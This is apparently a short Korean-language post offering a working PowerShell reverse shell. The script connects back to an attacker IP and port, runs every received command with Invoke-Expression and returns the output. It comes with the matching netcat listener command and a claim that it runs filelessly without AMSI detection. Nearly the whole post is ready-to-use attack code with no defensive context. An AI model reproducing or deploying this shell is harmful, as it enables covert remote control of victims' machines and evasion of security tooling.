[tool] Powershell Reverse Shell

reverse_shell.ps1

fileless로도 사용가능함(powershell에 동작되게 하면 AMSI 탐지 없이 실행 가능함)

$LHOST = "0.0.0.0"  	  # 공격자의 IP
$LPORT = 4444             # 공격자가 리스닝할 포트

$client = New-Object System.Net.Sockets.TCPClient($LHOST, $LPORT)
$stream = $client.GetStream()
$writer = New-Object System.IO.StreamWriter($stream)
$reader = New-Object System.IO.StreamReader($stream)

$writer.AutoFlush = $true
$sendBytes = [System.Text.Encoding]::ASCII.GetBytes("Connected`n")
$stream.Write($sendBytes, 0, $sendBytes.Length)

while ($true) {
    $cmd = $reader.ReadLine()
    if ($cmd -eq "exit") { break }
    $output = try { Invoke-Expression $cmd 2>&1 | Out-String } catch { $_.Exception.Message }
    $writer.WriteLine($output)
}

$writer.Close()
$reader.Close()
$stream.Close()
$client.Close()

 

nc command

nc -lnvp 4444

 

PoC